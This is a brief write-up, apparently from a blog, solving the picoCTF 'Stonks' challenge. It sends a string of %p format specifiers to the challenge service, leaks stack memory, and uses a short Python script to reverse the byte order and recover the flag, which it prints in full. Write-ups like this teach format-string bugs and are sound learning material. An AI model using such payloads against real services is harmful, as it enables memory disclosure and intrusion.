Published
- 1 min read
vuln.c nc mercury.picoctf.net 59616
The solution for this is noted below
vuln.c nc mercury.picoctf.net 59616
Solution
What is your API token?
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
Buying stonks with token:
0x8b953900x804b0000x80489c30xf7fa5d800xffffffff0x10x8b931600xf7fb31100xf7fa5dc7(nil)0x8b941800x20x8b953700x8b953900x6f6369700x7b4654430x306c5f490x345f74350x6d5f6c6c0x306d5f790x5f79336e0x346364620x616535320xffbd007d
Portion after (nil)
8b9418028b953708b953906f6369707b465443306c5f49345f74356d5f6c6c306d5f795f79336e3463646261653532ffbd007d
Use HxD to get
‹”��‹•7�¹S�ocip{FTC0l_I4_t5m_ll0m_y_y3n4cdbae52ÿ½�}
string = "ocip{FTC0l_I4_t5m_ll0m_y_y3n4cdbae52ÿ½�}"
out = ""
temp = ""
index = 0
for char in string:
temp += char
index += 1
if index%4 == 0:
fwd = ""
for temp_char in temp:
fwd = temp_char + fwd
out += fwd
temp = ""
print(out)
prints out picoCTF{I_l05t_4ll_my_m0n3y_bdc425ea}�½ÿ
Flag: picoCTF{I_l05t_4ll_my_m0n3y_bdc425ea}
Try other methods by searching on the site. That is if this doesn’t work